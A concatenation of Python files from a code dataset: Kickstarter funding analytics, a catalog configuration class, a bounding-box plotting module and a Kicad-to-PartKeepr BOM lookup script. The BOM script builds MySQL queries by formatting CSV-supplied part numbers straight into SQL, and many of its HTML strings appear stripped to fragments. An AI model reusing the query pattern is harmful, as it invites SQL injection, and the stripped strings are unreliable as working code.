rawFundingVersusSuccessStats[\"1,000,001+ Success\"] += 1\r\n elif project[\"state\"] == \"failed\" and float(project[\"usd_goal_real\"]) > 1000000:\r\n rawFundingVersusSuccessStats[\"1,000,001+ Failed\"] += 1\r\n\r\n fundingVersusSuccessStats = {\r\n \"$0-$100\": round((rawFundingVersusSuccessStats[\"0-100 Success\"] / (rawFundingVersusSuccessStats[\"0-100 Success\"] + rawFundingVersusSuccessStats[\"0-100 Failed\"]) * 100), 2),\r\n \"$101-$1,000\": round((rawFundingVersusSuccessStats[\"101-1,000 Success\"] / (rawFundingVersusSuccessStats[\"101-1,000 Success\"] + rawFundingVersusSuccessStats[\"101-1,000 Failed\"]) * 100), 2),\r\n \"$1,001-$10,000\": round((rawFundingVersusSuccessStats[\"1,001-10,000 Success\"] / (rawFundingVersusSuccessStats[\"1,001-10,000 Success\"] + rawFundingVersusSuccessStats[\"1,001-10,000 Failed\"]) * 100), 2),\r\n \"$10,001-$100,000\": round((rawFundingVersusSuccessStats[\"10,001-100,000 Success\"] / (rawFundingVersusSuccessStats[\"10,001-100,000 Success\"] + rawFundingVersusSuccessStats[\"10,001-100,000 Failed\"]) * 100), 2),\r\n \"$100,001-$1,000,000\": round((rawFundingVersusSuccessStats[\"100,001-1,000,000 Success\"] / (rawFundingVersusSuccessStats[\"100,001-1,000,000 Success\"] + rawFundingVersusSuccessStats[\"100,001-1,000,000 Failed\"]) * 100), 2),\r\n \"$1,000,001+\": round((rawFundingVersusSuccessStats[\"1,000,001+ Success\"] / (rawFundingVersusSuccessStats[\"1,000,001+ Success\"] + rawFundingVersusSuccessStats[\"1,000,001+ Failed\"]) * 100), 2)\r\n }\r\n\r\n return fundingVersusSuccessStats\r\n\r\ndef getDeadlineStats(projectList):\r\n\r\n deadlineStats = {\r\n \"January\": 0,\r\n \"February\": 0,\r\n \"March\": 0,\r\n \"April\": 0,\r\n \"May\": 0,\r\n \"June\": 0,\r\n \"July\": 0,\r\n \"August\": 0,\r\n \"September\": 0,\r\n \"October\": 0,\r\n \"November\": 0,\r\n \"December\": 0\r\n }\r\n\r\n launchStats = {\r\n \"January\": 0,\r\n \"February\": 0,\r\n \"March\": 0,\r\n \"April\": 0,\r\n \"May\": 0,\r\n \"June\": 0,\r\n \"July\": 0,\r\n \"August\": 0,\r\n \"September\": 0,\r\n \"October\": 0,\r\n \"November\": 0,\r\n \"December\": 0\r\n }\r\n\r\n for project in projectList:\r\n deadlineDate = project[\"deadline\"].split('/')\r\n if deadlineDate[0] == '1':\r\n deadlineStats[\"January\"] += 1\r\n elif deadlineDate[0] == '2':\r\n deadlineStats[\"February\"] += 1\r\n elif deadlineDate[0] == '3':\r\n deadlineStats[\"March\"] += 1\r\n elif deadlineDate[0] == '4':\r\n deadlineStats[\"April\"] += 1\r\n elif deadlineDate[0] == '5':\r\n deadlineStats[\"May\"] += 1\r\n elif deadlineDate[0] == '6':\r\n deadlineStats[\"June\"] += 1\r\n elif deadlineDate[0] == '7':\r\n deadlineStats[\"July\"] += 1\r\n elif deadlineDate[0] == '8':\r\n deadlineStats[\"August\"] += 1\r\n elif deadlineDate[0] == '9':\r\n deadlineStats[\"September\"] += 1\r\n elif deadlineDate[0] == '10':\r\n deadlineStats[\"October\"] += 1\r\n elif deadlineDate[0] == '11':\r\n deadlineStats[\"November\"] += 1\r\n elif deadlineDate[0] == '12':\r\n deadlineStats[\"December\"] += 1\r\n\r\n launchDate = project[\"launched\"].split('/')\r\n if launchDate[0] == '1':\r\n launchStats[\"January\"] += 1\r\n elif launchDate[0] == '2':\r\n launchStats[\"February\"] += 1\r\n elif launchDate[0] == '3':\r\n launchStats[\"March\"] += 1\r\n elif launchDate[0] == '4':\r\n launchStats[\"April\"] += 1\r\n elif launchDate[0] == '5':\r\n launchStats[\"May\"] += 1\r\n elif launchDate[0] == '6':\r\n launchStats[\"June\"] += 1\r\n elif launchDate[0] == '7':\r\n launchStats[\"July\"] += 1\r\n elif launchDate[0] == '8':\r\n launchStats[\"August\"] += 1\r\n elif launchDate[0] == '9':\r\n launchStats[\"September\"] += 1\r\n elif launchDate[0] == '10':\r\n launchStats[\"October\"] += 1\r\n elif launchDate[0] == '11':\r\n launchStats[\"November\"] += 1\r\n elif launchDate[0] == '12':\r\n launchStats[\"December\"] += 1\r\n\r\n return deadlineStats, launchStats","sub_path":"src/modules/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":17918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"378843796","text":"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom future import standard_library\nstandard_library.install_aliases()\nfrom builtins import *\nfrom builtins import object\n\nfrom .constants import *\n\nclass CatalogStore(object):\n debug = False\n uuid5_namespace = Constants.UUID_NAMESPACE\n agave_storage_system = Constants.CATALOG_AGAVE_STORAGE_SYSTEM\n agave_root_dir = Constants.CATALOG_AGAVE_ROOT_DIR\n uploads_dir = Constants.UPLOADS_ROOT\n products_dir = Constants.PRODUCTS_ROOT\n references_dir = Constants.REFERENCES_ROOT\n collections = {'updates': 'updates',\n 'fixity': 'files-fixity',\n 'files': 'files',\n 'challenges': 'challenges',\n 'experiments': 'experiments',\n 'samples': 'samples',\n 'measurements': 'measurements',\n 'pipelines': 'pipelines',\n 'jobs': 'jobs',\n 'tokens': 'tokens',\n 'products_files': 'products_files',\n 'products_files_fixity': 'products_files_fixity',\n 'inputs_files': 'inputs_files',\n 'inputs_files_fixity': 'inputs_files_fixity'}\n batch = 1000\n mongodb = {'host': 'catalog.sd2e.org',\n 'port': '27020', 'username': None,\n 'password': None, 'replica_set': None}\n","sub_path":"datacatalog/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"650081918","text":"# Visualize module for plotting and handling predictions\nimport os\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom skimage import io\nimport numpy as np\n\ndef format_boxes(prediction, scores=True):\n \"\"\"Format a retinanet prediction into a pandas dataframe for a single image\n Args:\n prediction: a dictionary with keys 'boxes' and 'labels' coming from a retinanet\n scores: Whether boxes come with scores, during prediction, or without scores, as in during training.\n Returns:\n df: a pandas dataframe\n \"\"\"\n\n df = pd.DataFrame(prediction[\"boxes\"].cpu().detach().numpy(),\n columns=[\"xmin\", \"ymin\", \"xmax\", \"ymax\"])\n df[\"label\"] = prediction[\"labels\"].cpu().detach().numpy()\n\n if scores:\n df[\"score\"] = prediction[\"scores\"].cpu().detach().numpy()\n\n return df\n\n\ndef plot_prediction_and_targets(image, predictions, targets, image_name, savedir):\n \"\"\"Plot an image, its predictions, and its ground truth targets for debugging\"\"\"\n prediction_df = format_boxes(predictions)\n plot, ax = plot_predictions(image, prediction_df)\n target_df = format_boxes(targets, scores=False)\n plot = add_annotations(plot, ax, target_df)\n plot.savefig(\"{}/{}.png\".format(savedir, image_name), dpi=300)\n return \"{}/{}.png\".format(savedir, image_name)\n\n\ndef plot_prediction_dataframe(df, root_dir, ground_truth=None, savedir=None, show=False):\n \"\"\"For each row in dataframe, call plot predictions. For multi-class labels, boxes will be colored by labels. Ground truth boxes will all be same color, regardless of class.\n Args:\n df: a pandas dataframe with image_path, xmin, xmax, ymin, ymax and label columns\n root_dir: relative dir to look for image names from df.image_path\n ground_truth: an optional pandas dataframe in same format as df holding ground_truth boxes\n savedir: save the plot to an optional directory path.\n show (logical): Render the plot in the matplotlib GUI\n Returns:\n None: side-effect plots are saved or generated and viewed\n \"\"\"\n for name, group in df.groupby(\"image_path\"):\n image = io.imread(\"{}/{}\".format(root_dir, name))\n plot, ax = plot_predictions(image, group, show=show)\n \n if ground_truth is not None:\n annotations = ground_truth[ground_truth.image_path == name]\n plot = add_annotations(plot, ax, annotations)\n \n if savedir:\n plot.savefig(\"{}/{}.png\".format(savedir, os.path.splitext(name)[0]))\n \n\ndef plot_predictions(image, df, show=False):\n \"\"\"channel order is channels first for pytorch\n By default this function does not show, but only plots an axis\n \"\"\"\n if not show:\n original_backend = matplotlib.get_backend()\n matplotlib.use(\"Agg\")\n \n #Create a numeric index for coloring\n df['numeric'] = df['label'].astype('category').cat.codes\n\n #What size does the figure need to be in inches to fit the image?\n dpi=300\n height, width, nbands = image.shape\n figsize = width / float(dpi), height / float(dpi)\n\n fig, ax = plt.subplots(figsize=figsize)\n ax.imshow(image)\n for index, row in df.iterrows():\n xmin = row[\"xmin\"]\n ymin = row[\"ymin\"]\n width = row[\"xmax\"] - xmin\n height = row[\"ymax\"] - ymin\n color = label_to_color(row[\"numeric\"])\n rect = create_box(xmin=xmin, ymin=ymin, height=height, width=width, color=color)\n ax.add_patch(rect)\n # no axis show up\n plt.axis('off')\n \n #reload matplotlib to get use back their favorite backend.\n if not show:\n matplotlib.use(original_backend)\n \n return fig, ax\n\n\ndef create_box(xmin, ymin, height, width, color=\"cyan\", linewidth=0.5):\n rect = patches.Rectangle((xmin, ymin),\n height,\n width,\n linewidth=linewidth,\n edgecolor=color,\n fill=False)\n return rect\n\n\ndef add_annotations(plot, ax, annotations):\n \"\"\"Add annotations to an already created visuale.plot_predictions\n Args:\n plot: matplotlib figure object\n ax: maplotlib axes object\n annotations: pandas dataframe of bounding box annotations\n Returns:\n plot: matplotlib figure object\n \"\"\"\n for index, row in annotations.iterrows():\n xmin = row[\"xmin\"]\n ymin = row[\"ymin\"]\n width = row[\"xmax\"] - xmin\n height = row[\"ymax\"] - ymin\n rect = create_box(xmin=xmin,\n ymin=ymin,\n height=height,\n width=width,\n color=\"orange\")\n ax.add_patch(rect)\n\n return plot\n\n\ndef label_to_color(label):\n color_dict = {}\n colors = [\n list((matplotlib.colors.hsv_to_rgb([x, 1.0, 1.0])).astype(int))\n for x in np.arange(0, 1, 1.0 / 80)\n ]\n for index, color in enumerate(colors):\n color_dict[index] = color\n\n # hand pick the first few colors\n color_dict[0] = \"cyan\"\n color_dict[1] = \"tomato\"\n color_dict[2] = \"blue\"\n color_dict[3] = \"limegreen\"\n color_dict[4] = \"orchid\"\n color_dict[5] = \"crimson\"\n color_dict[6] = \"peru\"\n color_dict[7] = \"dodgerblue\"\n color_dict[8] = \"gold\"\n color_dict[9] = \"blueviolet\"\n\n return color_dict[label]\n","sub_path":"deepforest/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":5458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"456168650","text":"#!/usr/bin/env python3\n# coding=utf-8\n\n# TODO: Put all CSS into single external stylesheet [partially done]\n# TODO: Split html write headers / intro etc into seperate project\n\n\nimport csv\nimport decimal\nimport json\nimport os\nimport re\nimport subprocess\nimport sys\nimport urllib.error\nimport urllib.parse\nimport urllib.request\nimport webbrowser\nfrom datetime import datetime\nfrom pprint import pprint\n\nimport requests\n\nfrom currency_converter import CurrencyConverter\nfrom json2html import *\nfrom K2PKConfig import *\nfrom mysql.connector import Error, MySQLConnection\n\n# NOTE: Set precistion to cope with nano, pico & giga multipliers.\nctx = decimal.Context()\nctx.prec = 12\n\n\nfile_name = sys.argv[1]\nprojectName, ext = file_name.split(\".\")\nprint(projectName)\n\n# Make baseline barcodes and web directories\ntry:\n os.makedirs('./assets/barcodes')\nexcept OSError:\n pass\n\ntry:\n os.makedirs('./assets/web')\nexcept OSError:\n pass\n\ninvalidate_BOM_Cost = False\n\ntry:\n distribConfig = read_distributors_config()\n preferred = (distribConfig['preferred'])\nexcept:\n KeyError\n print('No preferred distributors in config.ini')\n pass\n\n\ndef float_to_str(f):\n d1 = ctx.create_decimal(repr(f))\n return format(d1, 'f')\n\n\ndef convert_units(num):\n factors = [\"G\", \"M\", \"K\", \"k\", \"R\", \"\", \".\", \"m\", \"u\", \"n\", \"p\"]\n conversion = {\n 'G': '1000000000',\n 'M': '1000000',\n 'K': '1000',\n 'k': '1000',\n 'R': '1',\n '.': '1',\n '': '1',\n 'm': '0.001',\n \"u\": '0.000001',\n 'n': '0.000000001',\n 'p': '0.000000000001'}\n val = \"\"\n mult = \"\"\n\n for i in range(len(num)):\n if num[i] == \".\":\n mult = num[i]\n if num[i] in factors:\n mult = num[i]\n val = val + \".\"\n else:\n if num[i].isdigit():\n val = val + (num[i])\n else:\n print(\"Invalid multiplier\")\n return(\"0\")\n break\n if val.endswith(\".\"):\n val = val[:-1]\n m = float(conversion[mult])\n v = float(val)\n r = float_to_str(m * v)\n\n r = r.rstrip(\"0\")\n r = r.rstrip(\".\")\n return(r)\n\n\ndef partStatus(partID, parameter):\n dbconfig = read_db_config()\n try:\n conn = MySQLConnection(**dbconfig)\n cursor = conn.cursor()\n sql = \"SELECT R.stringValue FROM PartParameter R WHERE (R.name = '{}') AND (R.part_id = {})\".format(\n parameter, partID)\n cursor.execute(sql)\n partStatus = cursor.fetchall()\n\n if partStatus == []:\n part = \"Unknown\"\n else:\n part = str(partStatus[0])[2:-3]\n return (part)\n\n except UnicodeEncodeError as err:\n print(err)\n\n finally:\n cursor.close()\n conn.close()\n\n\ndef getDistrib(partID):\n\n dbconfig = read_db_config()\n try:\n conn = MySQLConnection(**dbconfig)\n cursor = conn.cursor()\n sql = \"\"\"SELECT D.name, PD.sku, D.skuurl FROM Distributor D\n\t\t\t\tLEFT JOIN PartDistributor PD on D.id = PD.distributor_id\n\t\t\t\tWHERE PD.part_id = {}\"\"\".format(partID)\n cursor.execute(sql)\n distributors = cursor.fetchall()\n unique = []\n d = []\n distributor = []\n\n for distributor in distributors:\n if distributor[0] not in unique and distributor[0] in preferred:\n unique.append(distributor[0])\n d.append(distributor)\n return(d)\n\n except UnicodeEncodeError as err:\n print(err)\n\n finally:\n cursor.close()\n conn.close()\n\n\ndef octopartLookup(partIn, bean):\n\n try:\n octoConfig = read_octopart_config()\n apikey = (octoConfig['apikey'])\n except:\n KeyError\n print('No Octopart API key in config.ini')\n return (2)\n\n try:\n currencyConfig = read_currency_config()\n locale = (currencyConfig['currency'])\n except:\n KeyError\n print(\"No currency configured in config.ini\")\n return(4)\n\n # Get currency rates from European Central Bank\n # Fall back on cached cached rates\n try:\n c = CurrencyConverter(\n 'http://www.ecb.europa.eu/stats/eurofxref/eurofxref.zip')\n except:\n URLError\n c = CurrencyConverter()\n return(8)\n\n web = str(\"./assets/web/\" + partIn + \".html\")\n\n webpage = open(web, \"w\")\n\n # Replace spaces in part name with asterisk for 'wildcard' search\n\n Part = partIn.replace(\" \", \"*\")\n\n aside = open(\"./assets/web/tmp.html\", \"w\")\n\n htmlHeader = \"\"\"\n \n \n \n \n \n \n Octopart Lookup\n \n \n \n \n\n \n \n \n\n \n \n \n\n \n
\n

Kicad2PartKeepr

\n
\n
\n
\n
    \n
\n
\n
\n \"\"\"\n\n webpage.write(htmlHeader)\n\n ##################\n bean = False\n # FIXME: Treat 'bean' devices separately - use 'search' API not 'match'\n # FIXME: Search only for Non_PK parts in first instance.\n ##################\n\n if bean:\n #\n url = \"http://octopart.com/api/v3/parts/search\"\n url += '?apikey=' + apikey\n url += '&q=\"' + Part + '\"'\n url += '&include[]=descriptions'\n # url += '&include[]=imagesets'\n # url += '&include[]=specs'\n # url += '&include[]=datasheets'\n url += '&country=GB'\n data = urllib.request.urlopen(url).read()\n response = json.loads(data)\n pprint(response)\n else:\n url = \"http://octopart.com/api/v3/parts/match\"\n url += '?apikey=' + apikey\n url += '&queries=[{\"mpn\":\"' + Part + '\"}]'\n url += '&include[]=descriptions'\n url += '&include[]=imagesets'\n url += '&include[]=specs'\n url += '&include[]=datasheets'\n url += '&country=GB'\n\n data = urllib.request.urlopen(url).read()\n response = json.loads(data)\n\n loop = False\n\n for result in response['results']:\n for item in result['items']:\n if loop:\n break\n loop = True\n\n partNum = item['mpn']\n\n try:\n description = str(item['descriptions'][0].get('value', None))\n except:\n IndexError\n description = \"\"\n\n webpage.write(\n \"

\" +\n partNum +\n \"

\" +\n description +\n \"



\")\n\n # Get image (if present). Also need to get attribution for Octopart licensing\n try:\n image = str(item['imagesets'][0]\n ['medium_image'].get('url', None))\n except:\n IndexError\n image = \"\"\n\n try:\n credit = str(item['imagesets'][0].get('credit_string', None))\n except:\n IndexError\n credit = \"\"\n\n aside.write(\"
Image credit: \" + credit + \"


\")\n aside.write(\"\")\n\n for spec in item['specs']:\n parm = item['specs'][spec]['metadata']['name']\n try:\n if type(item['specs'][spec]['display_value']):\n val = str(item['specs'][spec]['display_value'])\n except:\n IndexError\n val = \"Not Listed by Manufacturer\"\n\n parameter = ((\"{:30} \").format(parm))\n value = ((\"{:40}\").format(val))\n# print(parameter, \" : \", value)\n print((\"| {:30} : {:124} |\").format(parameter, value))\n aside.write(\n \"\")\n print(('{:_<162}').format(\"\"))\n\n aside.write(\"
CharacteristicValue
\" +\n parameter +\n \"\" +\n value +\n \"
\")\n aside.write(\n \"\")\n\n for datasheet in item['datasheets']:\n try:\n if (datasheet['metadata']['last_updated']):\n dateUpdated = (datasheet['metadata']\n ['last_updated'])[:10]\n else:\n dateUpdated = \"Unknown\"\n except:\n IndexError\n dateUpdated = \"Unknown\"\n\n if datasheet['attribution']['sources'] is None:\n source = \"Unknown\"\n else:\n source = datasheet['attribution']['sources'][0]['name']\n\n numPages = str(datasheet['metadata']['num_pages'])\n documents = (\n (\"| {:30} {:11} {:12} {:7} {:7} {:1} {:84} |\").format(\n source,\n \" Updated: \",\n dateUpdated,\n \"Pages: \",\n numPages, \"\", datasheet['url']))\n print(documents)\n aside.write(\n \"\")\n if loop:\n webpage.write(\"
DatasheetsDatePages
\" +\n source +\n \" \" +\n dateUpdated +\n \"\" +\n numPages +\n \"
\")\n else:\n webpage.write(\"

No Octopart results found

\")\n\n # Header row here\n\n webpage.write(\"\")\n count = 0\n\n for result in response['results']:\n\n for item in result['items']:\n if count == 0:\n print(('{:_<162}').format(\"\"))\n print((\"| {:24} | {:19} | {:>9} | {:>7} | {:11} | {:5} \").format(\n \"Seller\", \"SKU\", \"Stock\", \"MOQ\", \"Package\", \"Currency\"), end=\"\")\n print(\n (\"| {:>10}| {:>10}| {:>10}| {:>10}| {:>10}|\").format(\n \"1\",\n \"10\",\n \"100\",\n \"1000\",\n \"10000\"))\n print(('{:-<162}').format(\"\"), end=\"\")\n count += 1\n\n # Breaks at 1, 10, 100, 1000, 10000\n for offer in item['offers']:\n loop = 0\n _seller = offer['seller']['name']\n _sku = (offer['sku'])[:19]\n _stock = offer['in_stock_quantity']\n _moq = str(offer['moq'])\n\n if _moq == \"None\":\n _moq = '-'\n _package = str(offer['packaging'])\n\n if _package == \"None\":\n _package = \"-\"\n\n print()\n\n print((\"| {:24} | {:19} | {:>9} | {:>7} | {:11} |\").format(\n _seller, _sku, _stock, _moq, _package), end=\"\")\n line = \"\"\n webpage.write(line)\n\n valid = False\n points = ['-', '-', '-', '-', '-']\n for currency in offer['prices']:\n # Some Sellers don't have currency so use this to fill the line\n valid = True\n\n if currency == locale:\n # Base currency is local\n loop += 1\n if loop == 1:\n print((\" {:3} |\").format(currency), end=\"\")\n webpage.write(\"\")\n else:\n # Only try and convert first currency\n loop += 1\n if loop == 1:\n print((\" {:3}* |\").format(locale), end=\"\")\n webpage.write(\"\")\n\n if loop == 1:\n\n for breaks in offer['prices'][currency]:\n\n _moqv = offer['moq']\n if _moqv is None:\n _moqv = 1\n _moqv = int(_moqv)\n i = 0\n\n # Break 0 - 9\n if breaks[0] < 10:\n points[0] = round(\n c.convert(breaks[1], currency, locale), 2)\n # if _moqv >= breaks[0]:\n # Propogate right\n for i in range(0, 4):\n points[i + 1] = points[i]\n\n # Break 10 to 99\n if breaks[0] >= 10 and breaks[0] < 100:\n points[1] = round(\n c.convert(breaks[1], currency, locale), 3)\n # if _moqv >= breaks[0]:\n for i in range(1, 4):\n points[i + 1] = points[i]\n\n # Break 100 to 999\n if breaks[0] >= 100 and breaks[0] < 1000:\n points[2] = round(\n c.convert(breaks[1], currency, locale), 4)\n # if _moqv >= breaks[0]:\n for i in range(2, 4):\n points[i + 1] = points[i]\n\n # Break 1000 to 9999\n if breaks[0] >= 1000 and breaks[0] < 10000:\n points[3] = round(\n c.convert(breaks[1], currency, locale), 5)\n# if _moqv >= breaks[0]:\n points[4] = points[3]\n\n # Break 10000+\n if breaks[0] >= 10000:\n points[4] = round(\n c.convert(\n breaks[1],\n currency,\n locale),\n 6)\n else:\n points[4] = points[3]\n\n for i in range(0, 5):\n print((\" {:>10.5}|\").format(points[i]), end=\"\")\n webpage.write(\"\")\n webpage.write(\"\")\n if not valid:\n print(\" |\", end=\"\")\n webpage.write(\"\")\n for i in range(0, 5):\n print((\" {:>10.5}|\").format(points[i]), end=\"\")\n webpage.write(\"\")\n webpage.write(\"\")\n valid = False\n webpage.write(\"
SellerSKUStockMOQPackageCurrency110100100010000
\" + _seller + \"\" + str(\n offer['sku']) + \"\" + str(_stock) + \"\" + str(_moq) + \"\" + _package + \"\" + currency + \"\" + locale + \"*\" + str(points[i]) + \"
\" + str(points[i]) + \"
\")\n print()\n print(('{:=<162}').format(\"\"))\n\n aside.close()\n side = open(\"./assets/web/tmp.html\", \"r\")\n\n aside = side.read()\n\n webpage.write(aside + \"\")\n webpage.write(\n \"
\")\n return\n\n################################################################################\n# Further setup or web configuration here\n#\n#\n################################################################################\n\n\ncompliance = {\n 'Compliant': 'assets/img/ROHS_GREEN.png',\n 'Non-Compliant': 'assets/img/ROHS_RED.png',\n 'Unknown': 'assets/img/ROHS_BLACK.png'\n}\n\nmanufacturing = {\n 'Obsolete': 'assets/img/FACTORY_RED.png',\n 'Not Recommended for New Designs': 'assets/img/FACTORY_YELLOW.png',\n 'Unknown': 'assets/img/FACTORY_BLUE.png',\n 'Active': 'assets/img/FACTORY_GREEN.png',\n 'Not Listed by Manufacturer': 'assets/img/FACTORY_PURPLE.png'\n}\n\ndateBOM = datetime.now().strftime('%Y-%m-%d')\ntimeBOM = datetime.now().strftime('%H:%M:%S')\n\nrun = 0\nweb = open(\"assets/web/temp.html\", \"w\")\npicklist = open(\"assets/web/picklist.html\", \"w\")\nlabels = open(\"assets/web/labels.html\", \"w\")\naccounting = open(\"assets/web/accounting.html\", \"w\")\nmissing = open(\"assets/web/missing.csv\", \"w\")\nunder = open(\"assets/web/under.csv\", \"w\")\nunder.write('Name,Description,Quantity,Stock,Min Stock\\n')\n\nhtmlHeader = \"\"\"\n\n\n\n\n\nKicad 2 PartKeepr\n\n\n
\n

Kicad2PartKeepr

\n
\n \n\n

\n


  Project name: \"\"\" + projectName + \\\n \"


  Date:\\t\" + dateBOM + \\\n \"

\\n


  Time:\\t\" + timeBOM + \"

\"\n\n\nhtmlBodyHeader = \"\"\"\n

\n\n\"\"\"\n\npicklistHeader = \"\"\"\n\n\n\n\nPicklist\n\n\n\n

Picklist

\\n

Project name: \"\"\"\n\npick2 = projectName + \"

\" + dateBOM + \"

\\n

\" + timeBOM + \"

\"\n\npicklist.write(picklistHeader + pick2 + \"
\")\n\n\nlabel_header = \"\"\"\n\n\n\n\nKicad to PartKeepr\n\n\n\n
\n\"\"\"\n\nlabels.write(label_header)\nlabel_cnt = 0\n\n\nhtmlAccountingHeader = \"\"\"\n
\n\"\"\"\n\n\nresistors = [\"R_1206\", \"R_0805\", \"R_0603\", \"R_0402\"]\ncapacitors = [\"C_1206\", \"C_0805\", \"C_0603\", \"C_0402\"]\n\n\ndef punctuate(value):\n if \".\" in value:\n multiplier = (value.strip()[-1])\n new_string = \"_\" + (re.sub(\"\\.\", multiplier, value))[:-1]\n else:\n new_string = \"_\" + value\n return(new_string)\n\n\ndef get_choice(possible):\n print(\"More than one component in the PartKeepr database meets the criteria:\")\n i = 1\n for name, description, stockLevel, minStockLevel, averagePrice, partNum, storage_locn, PKid, Manufacturer in possible:\n print(i, \" : \", name, \" : \", description)\n# subprocess.call(['/usr/local/bin/pyparts', 'specs', name])\n i = i + 1\n print(\"Choose which component to add to BOM (or 0 to defer)\")\n\n while True:\n choice = int(input('>'))\n if choice == 0:\n return (possible)\n if choice < 0 or choice > len(possible):\n continue\n break\n\n i = 1\n for name, description, stockLevel, minStockLevel, averagePrice, partNum, storage_locn, PKid, Manufacturer in possible:\n possible = (name, description, stockLevel, minStockLevel,\n averagePrice, partNum, storage_locn, PKid, Manufacturer)\n if i == choice:\n possible = (name, description, stockLevel, minStockLevel,\n averagePrice, partNum, storage_locn, PKid, Manufacturer)\n print(\"Selected :\")\n print(possible[0], \" : \", possible[1])\n return [possible]\n i = i + 1\n\n\ndef find_part(part_num):\n\n dbconfig = read_db_config()\n\n try:\n conn = MySQLConnection(**dbconfig)\n cursor = conn.cursor()\n\n bean = False\n\n if (part_num[:6]) in resistors:\n quality = \"Resistance\"\n variant = \"Resistance Tolerance\"\n bean = True\n if (part_num[:6]) in capacitors:\n quality = \"Capacitance\"\n variant = \"Dielectric Characteristic\"\n bean = True\n\n if (bean):\n component = part_num.split('_')\n\n if (len(component)) <= 2:\n print(\"Insufficient parameters (Needs 3 or 4) e.g. R_0805_100K(_±5%)\")\n return (\"0\")\n\n c_case = component[1]\n c_value = convert_units(component[2])\n\n if (len(component)) == 4:\n c_characteristics = component[3]\n\n # A fully specified 'bean'\n sql = \"\"\"SELECT P.name, P.description, P.stockLevel, P.minStockLevel, P.averagePrice, P.internalPartNumber, S.name, P.id, M.name\n FROM Part P\n JOIN PartParameter R ON R.part_id = P.id\n JOIN StorageLocation S ON S.id = P.storageLocation_id\n LEFT JOIN PartManufacturer PM on PM.part_id = P.id\n LEFT JOIN Manufacturer M on M.id = PM.manufacturer_id\n WHERE\n (R.name = 'Case/Package' AND R.stringValue='{}') OR\n (R.name = '{}' AND R.normalizedValue = '{}') OR\n (R.name = '{}' AND R.stringValue = '%{}')\n GROUP BY P.id, M.id, S.id\n HAVING\n COUNT(DISTINCT R.name)=3\"\"\".format(\n c_case, quality, c_value, variant, c_characteristics)\n else:\n # A partially specified 'bean'\n sql = \"\"\"SELECT P.name, P.description, P.stockLevel, P.minStockLevel, P.averagePrice, P.internalPartNumber, S.name, P.id, M.name\n FROM Part P\n JOIN PartParameter R ON R.part_id = P.id\n JOIN StorageLocation S ON S.id = P.storageLocation_id\n LEFT JOIN PartManufacturer PM on PM.part_id = P.id\n LEFT JOIN Manufacturer M on M.id = PM.manufacturer_id\n WHERE\n (R.name = 'Case/Package' AND R.stringValue='{}') OR\n (R.name = '{}' AND R.normalizedValue = '{}')\n GROUP BY P.id, M.id, S.id\n HAVING\n COUNT(DISTINCT R.name)=2\"\"\".format(\n c_case, quality, c_value)\n else:\n\n sql = \"\"\"SELECT P.name, P.description, P.stockLevel, P.minStockLevel, P.averagePrice, P.internalPartNumber, S.name, P.id, M.name\n FROM Part P\n JOIN StorageLocation S ON S.id = P.storageLocation_id\n LEFT JOIN PartManufacturer PM on PM.part_id = P.id\n LEFT JOIN Manufacturer M on M.id = PM.manufacturer_id\n WHERE P.name LIKE '%{}%'\"\"\".format(part_num)\n\n cursor.execute(sql)\n components = cursor.fetchall()\n return (components, bean)\n\n except UnicodeEncodeError as err:\n print(err)\n\n finally:\n cursor.close()\n conn.close()\n\n\n###############################################################################\n#\n# Main part of program follows\n#\n#\n###############################################################################\n\n\nwith open(file_name, newline='', encoding='utf-8') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=',')\n headers = reader.fieldnames\n\n filename, file_extension = os.path.splitext(file_name)\n\n outfile = open(\"./assets/web/\" + filename + '_PK.csv',\n 'w', newline='\\n', encoding='utf-8')\n writeCSV = csv.writer(outfile, delimiter=',')\n\n# Initialise accounting values\n countParts = 0\n count_BOMLine = 0\n count_NPKP = 0\n count_PKP = 0\n count_LowStockLines = 0\n count_PWP = 0\n bomCost = 0\n\n for row in reader:\n if not row:\n break\n new_string = \"\"\n part = row['Part#']\n value = row['Value']\n footprint = row['Footprint']\n datasheet = row['Datasheet']\n characteristics = row['Characteristics']\n references = row['References']\n quantity = row['Quantity Per PCB']\n # Need sufficient info to process. Some .csv reprocessing adds in lines\n # of NULL placeholders where there was a blank line.\n if part == \"\" and value == \"\" and footprint == \"\":\n break\n\n count_BOMLine = count_BOMLine + 1\n\n if footprint in resistors:\n if value.endswith(\"Ω\"): # Remove trailing 'Ω' (Ohms)\n value = (value[:-1])\n new_string = punctuate(value)\n\n if footprint in capacitors:\n if value.endswith(\"F\"): # Remove trailing 'F' (Farads)\n value = (value[:-1])\n new_string = punctuate(value)\n\n if characteristics is None:\n if characteristics != \"-\":\n new_string = new_string + \"_\" + str(characteristics)\n\n if part == \"-\":\n part = (str(footprint) + new_string)\n\n if references is None:\n break\n\n component_info, species = find_part(part)\n\n n_components = len(component_info)\n\n quantity = int(quantity)\n\n# Print to screen - these could all do with neatening up...\n print(('{:=<162}').format(\"\"))\n print((\"| BOM Line number : {:3} {:136} |\").format(count_BOMLine, \"\"))\n # print(\"| BOM Line number : \", count_BOMLine)\n\n print(('{:_<162}').format(\"\"))\n print(\n (\"| {:100} | {:13.13} | | Req = {:5}|\").format(\n references,\n part,\n quantity))\n print(('{:_<162}').format(\"\"))\n\n uniqueNames = []\n\n if n_components == 0:\n # print(\"| | |\")\n print((\"| {:100} | {:21} | {:16} | {:12} |\").format(\n \"No matching parts in database\", \"\", \"\", \"\"))\n print(('{:_<162}').format(\"\"))\n\n octopartLookup(part, species)\n print('\\n\\n')\n\n else:\n for (\n name,\n description,\n stockLevel,\n minStockLevel,\n averagePrice,\n partNum,\n storage_locn,\n PKid,\n Manufacturer) in component_info:\n ROHS = partStatus(PKid, 'RoHS')\n Lifecycle = partStatus(PKid, 'Lifecycle Status')\n # Can get rid of loop as never reset now\n print(\n (\"| {:100} | Location = 